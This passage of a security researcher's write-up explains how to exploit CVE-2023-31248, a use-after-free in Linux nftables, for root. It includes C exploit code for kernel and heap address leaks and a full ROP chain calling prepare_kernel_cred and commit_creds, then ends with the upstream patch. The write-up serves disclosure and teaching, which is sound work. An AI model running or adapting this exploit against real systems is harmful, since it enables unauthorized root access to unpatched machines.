		chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL_ACCOUNT);
	} else {
		if (!(flags & NFT_CHAIN_BINDING)) {
			err = -EINVAL;
			goto err_destroy_chain;

		snprintf(name, sizeof(name), "__chain%llu", ++chain_id);
		chain->name = kstrdup(name, GFP_KERNEL_ACCOUNT);
		chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT);
		if (chain->udata == NULL) {
			err = -ENOMEM;
			goto err_destroy_chain;
		chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]);

It is possible to leak data via reading from chain->name. However, as chain->name is treated as a string, it is only possible to print data up to a null byte.

To obtain a kernel text leak, struct seq_operations was chosen as the spray object. In kernel version 6.2.0, struct seq_operations is allocated in the kmalloc-cg-32 cache by the function single_open in fs/seq_file.c. This object is perfect for leaking as its first field, start, holds a kernel text pointer (the address of the single_start function).

struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);

struct seq_operations was sprayed to reclaim the freed space originally occupied by chain->name [8]. chain->name was then read to obtain a text leak, which can be used to calculate the kernel base [9].

    // Spray seq_operations to fill up kmalloc-cg-32 (chain->name)   
    printf("[+] Spray seq_operations to fill up kmalloc-cg-32 chain->name\n");
    for (int i = 0; i < NUM_SEQOPS; i++) {
        seqops[i] = open("/proc/self/stat", O_RDONLY);               <-- [8]
        if (seqops[i] < 0) {
            perror("[!] open");
    // Get kernel text address leak of single_start and calculate kbase
    char kbase_leak[0x10+1];
    uint64_t k_single_start = 0; // 0x4b2470 offset
    uint64_t kbase = 0;
    int err = 0;
    printf("[+] Getting leak\n");
    // Leak
    struct nftnl_rule *rleak = nftnl_rule_alloc();
    nftnl_rule_set_u32(rleak, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
    nftnl_rule_set_str(rleak, NFTNL_RULE_TABLE, table_name);
    nftnl_rule_set_str(rleak, NFTNL_RULE_CHAIN, "chain2");
    rseq = seq;
    nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, NFPROTO_IPV4, NLM_F_DUMP, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, rleak);
    mnl_socket_sendto(nl, buf, nlh->nlmsg_len);
    while (rseq < seq) {
        err = mnl_socket_recvfrom(nl, buf, sizeof(buf));
        err = mnl_cb_run(buf, err, rseq, mnl_socket_get_portid(nl), leak_cb, leak_expr_cb);
        rseq += err == 0;
    kbase = number - 0x4b2470;                                       <-- [9]
    printf("[+] Kernel base: 0x%llx\n", kbase);

Obtaining a heap leak

Ideally, to have enough space for our fake struct nft_rule, struct nft_expr and struct nft_expr_ops, we would like to have a kmalloc-cg-1024 heap leak (where we can allocate the struct msg_msg which contains all our fake objects). However, the least significant byte of a kmalloc-cg-1024 address is always null, and on little-endian x86-64 that is the first byte read when the pointer is treated as a string. The string would therefore be empty, preventing us from directly printing the address via chain->name.

To circumvent this limitation, we spray struct msg_msg as shown below (prev pointers are omitted for simplicity):

Leak kmalloc-cg-96 pointer

In a single message queue, there will be:

  1. Primary message (size 64) – this will reclaim the free space where chain->name originally was
  2. Secondary message (size 96)
  3. Third message (size 1024)

We will first attempt to leak a kmalloc-cg-96 pointer via the UAF read from the freed chain. chain->name would point to the next pointer of the primary message, which would be the address of the secondary message. A size of 96 bytes was chosen because kmalloc-cg-96 cache objects are small, so there is a much lower probability that the least significant byte of the address would be 0x0 and cause our leak to truncate and fail.

After obtaining a valid kmalloc-cg-96 heap pointer, we now want to leak the kmalloc-cg-1024 heap pointer. The next pointer of the secondary message points to the third message, which is allocated in kmalloc-cg-1024. We also know that the struct nft_chain object (which is now freed) was allocated in kmalloc-cg-128. To obtain the leak, we spray a fourth message of size 128 into the space of the freed chain object, and set the fake chain->name to the leaked kmalloc-cg-96 address + 1. Reading from that address starts just past the null least significant byte of the kmalloc-cg-1024 pointer stored there, so the remaining bytes of the pointer are printed. This is shown in the diagram below:

Leak kmalloc-cg-1024 pointer

We can now read from chain->name to obtain a kmalloc-cg-1024 pointer.

Controlling RIP

When a new rule is added to a base chain, the following functions are called to ensure that the ruleset will not result in any loops:

    -> nft_table_validate
        -> nft_chain_validate 
            -> expr->ops->validate

When nft_chain_validate is called, the expressions from the rules in the chain will be validated. nftables will use struct list_head rules in the nft_chain structure to determine what rules belong to the chain. However, we are able to control the space previously occupied by the freed target chain. This means that if we create a fake rule, with a fake expression and fake expression ops pointing to our ROP chain, and then spray a fake chain to reclaim the space of the freed target chain, and finally add a new rule to a base chain, we are able to kick off this chain of functions that will allow us to control RIP.

We first free the third message (size 1024) and the fourth message (size 128), which were used to leak the heap pointer. We then construct a fake rule, fake expression, fake expression ops and ROP chain in the data section of a struct msg_msg and spray that as our third message. The fake structures and ROP chain can be seen below:

    // Do all the ROP stuff in kmalloc-cg-1024
    printf("[+] PHASE 3: ROP\n");
    uint64_t fake_rule_addr = kheap_1024 + 0x230;
    printf("[+] Fake rule address: 0x%llx\n", fake_rule_addr);
    uint64_t fake_expr_addr = kheap_1024 + 0x260;
    printf("[+] Fake expr ops: 0x%llx\n", fake_expr_addr);
    // Make a fake rule 
    memset(&msg_three, 0, sizeof(msg_three));
    *(long *)&msg_three.mtype = 0x43;
    *(uint8_t *)&msg_three.mtext[0x215] = 0x10;
    *(long *)&msg_three.mtext[0x218] = fake_expr_addr;
    *(long *)&msg_three.mtext[0x278] = kbase + 0xba612a; // First rop point
    // 0xffffffff81ba612a : push rsi ; jmp qword ptr [rsi - 0x7f]
    // ROP!!!
    *(long *)&msg_three.mtext[0x199] = kbase + 0xd58be; // Second rop point
    // 0xffffffff810d58be : pop rsp ; pop r15 ; ret
    *(long *)&msg_three.mtext[0x220] = kbase + 0xd58c0; // pop rdi ; ret
    *(long *)&msg_three.mtext[0x228] = kbase + 0x2a1b600; // init_task
    *(long *)&msg_three.mtext[0x230] = kbase + 0x126bc0; // prepare_kernel_cred()
    *(long *)&msg_three.mtext[0x238] = kbase + 0xcb0f92; // pop rsi ; ret
    // 0xffffffff81cb0f92 : pop rsi ; ret 0
    *(long *)&msg_three.mtext[0x240] = kheap_1024 + 0x3a0 + 48 + 0x70; // rsi
    *(long *)&msg_three.mtext[0x248] = kbase + 0xd287b6; 
    // 0xffffffff81d287b6 : push rax ; jmp qword ptr [rsi - 0x70]
    // Jump point after push rax
    *(long *)&msg_three.mtext[0x3a0] = kbase + 0xd58c0; // pop rdi ; ret
    *(long *)&msg_three.mtext[0x250] = kbase + 0x1268e0; // commit_creds()
    *(long *)&msg_three.mtext[0x258] = kbase + 0xad163; // 4 pop
    *(long *)&msg_three.mtext[0x280] = kbase + 0x12011cb; // swapgs, iretq
    *(long *)&msg_three.mtext[0x288] = user_rip;
    *(long *)&msg_three.mtext[0x290] = user_cs;
    *(long *)&msg_three.mtext[0x298] = user_rflags;
    *(long *)&msg_three.mtext[0x2a0] = user_sp;
    *(long *)&msg_three.mtext[0x2a8] = user_ss;

    // Spray msg_msg of size 1024
    for (int i = 0; i < NUM_MSQIDS; i++) {
        if (msgsnd(msqid[i], &msg_three, sizeof(msg_three) - sizeof(long), 0) < 0) {
            perror("[!] msg_msg spray failed");

We then spray a fourth struct msg_msg which will act as our fake chain. Shown below is a summary of the objects involved:

Setup for ROP

To kick off the ROP chain, simply add a new rule to the previously created base chain “chain2”, and enjoy your root shell!

Patch Analysis

To patch the bug, simply check the genmask when looking up a chain by its ID.

 net/netfilter/nf_tables_api.c | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2694,7 +2694,7 @@ static int nf_tables_updchain(struct nft_ctx *ctx, u8 genmask, u8 policy,
 static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
 					       const struct nft_table *table,
-					       const struct nlattr *nla)
+					       const struct nlattr *nla, u8 genmask)
 	struct nftables_pernet *nft_net = nft_pernet(net);
 	u32 id = ntohl(nla_get_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
 		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
 		    chain->table == table &&
-		    id == nft_trans_chain_id(trans))
+		    id == nft_trans_chain_id(trans) &&
+		    nft_active_genmask(chain, genmask))
 			return chain;
 	return ERR_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
 			return -EOPNOTSUPP;
 	} else if (nla[NFTA_RULE_CHAIN_ID]) {
-		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
+		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+					      genmask);
 		if (IS_ERR(chain)) {
 			return PTR_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
 		} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
 			chain = nft_chain_lookup_byid(ctx->net, ctx->table,
-						      tb[NFTA_VERDICT_CHAIN_ID]);
+						      tb[NFTA_VERDICT_CHAIN_ID],
+						      genmask);
 			if (IS_ERR(chain))
 				return PTR_ERR(chain);
 		} else {

Exploit Demo

Here is a demonstration of the exploit in action:

The exploit script can be obtained here


I would like to thank my mentor Billy for teaching me so many cool techniques and guiding me, Jacob for giving me this internship opportunity, and everyone else at STAR Labs! :D

References and Credits

  1. Mingi Cho of Theori for reporting CVE-2023-31248
  2. David Bouman for his article on nftables and for the helper library functions https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/
  3. Bien Pham for stabilizing the race condition with audit and for the validate ops idea https://github.com/kungfulon/nf-tables-lpe/tree/master/chain-active
  4. Elixir Bootlin for the kernel source code https://elixir.bootlin.com/linux/v6.2/source/net/netfilter/nf_tables_api.c
  5. Andy Nguyen for msg_msg tricks https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html